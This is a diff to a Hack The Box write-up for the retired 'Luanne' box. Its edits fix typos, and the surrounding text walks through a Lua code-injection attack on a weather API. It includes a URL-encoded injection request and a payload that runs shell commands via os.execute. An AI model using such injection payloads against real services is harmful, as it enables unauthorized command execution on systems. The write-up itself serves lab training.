x00tex/hackTheBox/Boxes/linux/Retired/luanne/README.md

 	  <br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value

 * Error specified that the backend is running `lua` language.
-* try diffrent lua syntex and finaly execute lua syntex -
+* try different lua syntax and finely execute lua syntax -

 **Request:** `http://10.10.10.218/weather/forecast?city=%27%29%3Bprint%28%22pwn%22%29--`

 **Response:** `{"code": 500,"error": "unknown city: pwn`

-  * brackdown the payload -
+  * breakdown the payload -
     1. payload is url encoded formate
-	2. orignal lua syntex to fil the nill value `');<lua_syntex>--`
+	2. original lua syntax to fil the nill value `');<lua_syntax>--`

-* there is a `os.execute` function in the lua that exeecute shell command from lua syntex.
+* there is a `os.execute` function in the lua that execute shell command from lua syntax.
-* create a code executation payload with lua runtime -
+* create a code execution payload with lua runtime -

   **Payload:** `');os.execute("id")--`